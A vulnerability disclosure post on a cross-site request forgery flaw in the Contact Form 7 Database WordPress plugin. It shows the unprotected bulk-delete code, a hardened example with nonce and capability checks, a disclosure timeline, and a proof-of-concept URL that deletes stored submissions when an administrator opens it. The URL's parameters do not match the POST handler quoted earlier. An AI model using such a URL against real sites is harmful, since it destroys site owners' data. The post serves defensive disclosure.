Cross-Site Request Forgery (CSRF)/Form Submission Deletion Vulnerability in Contact Form 7 Database
While looking over another vulnerability in the plugin Contact Form 7 Database we also noticed that it lacked protection against cross-site request forgery (CSRF) when deleting the form submissions that it stores.
The following code in the file /admin/table.php handles processing requests to delete form submissions:
```php
// If the delete bulk action is triggered
if ((isset($_POST['action']) && $_POST['action'] == 'bulk-delete')
    || (isset($_POST['action2']) && $_POST['action2'] == 'bulk-delete')
) {
    $delete_ids = esc_sql($_POST['bulk-delete']);
    // loop over the array of record IDs and delete them
    foreach ($delete_ids as $id) {
        $this->delete_entry($id);
    }
}
```
The code doesn’t check for a valid nonce, which is the mechanism WordPress uses to prevent CSRF.
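For comparison, here is how the same bulk-delete handler looks with the missing checks in place. This is an added example written for this post, not the plugin’s own code or its 1.2 fix; the nonce action name `cf7d_bulk_delete`, the field name `cf7d_nonce`, the `manage_options` capability and the wrapper function names are assumptions chosen for the illustration.

```php
<?php
// Added example (not the plugin's code): a hardened form of the bulk-delete
// handler from /admin/table.php. 'cf7d_bulk_delete', 'cf7d_nonce' and the
// function names below are assumed placeholders, not plugin identifiers.

// 1. Where the submissions table form is rendered: emit a nonce tied to
//    this specific action so the handler can prove the request came from
//    this form and not from a page on another site.
function cf7d_example_render_form_footer() {
    wp_nonce_field( 'cf7d_bulk_delete', 'cf7d_nonce' );
}

// 2. Where the POST is handled. $table stands for the list-table object
//    whose delete_entry() method is shown in the vulnerable snippet.
function cf7d_example_process_bulk_action( $table ) {
    $action  = isset( $_POST['action'] )  ? sanitize_key( wp_unslash( $_POST['action'] ) )  : '';
    $action2 = isset( $_POST['action2'] ) ? sanitize_key( wp_unslash( $_POST['action2'] ) ) : '';

    if ( 'bulk-delete' !== $action && 'bulk-delete' !== $action2 ) {
        return; // not a delete request, nothing to do
    }

    // Capability check: the original relied only on the page being in wp-admin.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to delete submissions.', 'cf7d-example' ), '', array( 'response' => 403 ) );
    }

    // CSRF check: check_admin_referer() reads $_REQUEST['cf7d_nonce'] and stops
    // with a "link has expired" page when the nonce is absent or invalid.
    check_admin_referer( 'cf7d_bulk_delete', 'cf7d_nonce' );

    // Validate the IDs as positive integers rather than passing them through
    // esc_sql(): escaping is not validation, and delete_entry() should only
    // ever receive integers. absint() drops anything that is not a number,
    // and array_filter() removes the resulting zeros.
    $ids = isset( $_POST['bulk-delete'] ) ? (array) wp_unslash( $_POST['bulk-delete'] ) : array();
    $ids = array_filter( array_map( 'absint', $ids ) );

    foreach ( $ids as $id ) {
        $table->delete_entry( $id );
    }
}
```

The order matters: the capability and nonce checks run before any ID is read, so a forged request fails before the handler touches stored submissions.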
Proof of Concept
The following proof of concept will delete the form submissions with the ID 1 and 2, when logged in as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress.
http://[path to WordPress]/wp-admin/admin.php?page=cf7-data&action=-1&cf7d-export=-1&del_id%5B%5D=1&del_id%5B%5D=2&action2=delete&btn_apply2=Apply
Timeline
- March 27, 2017 – Developer notified.
- April 3, 2017 – WordPress.org Plugin Directory notified.
- April 3, 2017 – Plugin removed from WordPress.org Plugin Directory.
- April 4, 2017 – Version 1.2 submitted to WordPress.org Plugin Directory’s Subversion repository, which fixes the vulnerability.